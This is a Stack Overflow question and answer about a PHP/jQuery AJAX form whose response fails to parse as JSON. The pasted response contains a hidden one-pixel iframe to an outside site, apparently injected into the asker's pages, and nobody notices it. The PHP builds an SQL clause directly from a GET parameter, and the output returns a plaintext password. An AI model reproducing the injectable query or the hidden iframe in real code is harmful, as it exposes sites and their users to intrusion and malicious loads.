# fill 3 text box from select box ajax way

Tags: php, jquery, ajax

Hi Iam new with php and ajax I have a select box that when user selects the info must fill in to four text box.someone suggest to use jQuery [my first code](https://stackoverflow.com/questions/11688192/fill-multiple-textbox-from-database-the-ajax-way)

anyway my php code is

```
if(isset($_GET['username']))
{
    $username=$_GET['username'];
    $usr1=new USER;
    $where="username='$username'";
    $a=$usr1->show($where);
    echo json_encode($a);
}
```

and my form is here

```
 <form id="f1">
    <select id="s1">
    <option selected></option>
    <option value="admin" >admin</option>
    <option value="pooria.hojjati">pooria.hojjati</option>
    </select><br>
    <input type="text" id="name" value=""><br>
    <input type="text" id="family" value=""><br>
    <input type="text" id="email" value=""><br>
    <input type="text" id="pri" value=""><br>
    <!--<input type="button" value="press me" id="btn">-->
    </form>

    <div id="d">
    un replaced
    </div>

    <script language="javascript">

$("#f1 select:#s1").change(function(){
    var a=$("#f1 select:#s1").val();
    $.ajax({
            url:'ajax.php',
            data:{username:a},
            type:'get',
            datatype:'json',
            success:function(res){
            var b=JSON.parse(res);
            $("#f1 input:#name").val(b.name);
            $("#f1 input:#family").val(b.family);
            $("#f1 input:#email").val(b.email);
            $("#f1 input:#pri").val(b.privilege);}
            })


    });
</script>
```

and i have an error: SyntaxError: JSON.parse: unexpected character

And when I alert the response I get this:

```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>Untitled Document</title>

</head>



<body>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>user</title>

</head>



<body>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>DB</title>

</head>



<body>

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>

</body>

</html>

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>

</body>

</html>

{"id":"1","name":"\u067e\u0648\u0631\u06cc\u0627","family":"\u062d\u062c\u062a\u06cc \u0628\u0633\u0637\u0627\u0645\u06cc","username":"pooria.hojjati","password":"12044525","email":"pooria.hojjati@gmail.com","privilege":"1"}</body>

</html>
```

Comment: What does the JSON you are trying to parse look like? Can you paste this as well?

Comment: What do you mean by this? I use WAMP and JSON is included in version that i use

Comment: ajax.php has to return JSON. What does it return now?

Comment: When i alert the response there is a complete page with full header and of course my result but the result didn't placed in text boxes. I think in some way I should remove the header. And of course in some way make result UTF-8

Comment: You need to paste the response here.

Comment: @Jonas G. Drange I added my response could you check it?

Comment: Your response needs to be json.

Comment: so how can I make it to Json?

Comment: http://php.net/manual/en/book.json.php

Answer (score 0):

In jQuery, the selector `$("#f1 select:#s1")` is not correct syntax. This selector should be `$("#f1 select#s1")`. The same for the other selectors as well. `:foo` selectors are jQuery special selectors like `:checked`, `:contains()`, etc.

Are you using a framework in your php code which is creating the html layout? Try to bypass it. After calling `echo json_encode(...)`, call `exit;`. This will immediately stop execution and output the buffer so far.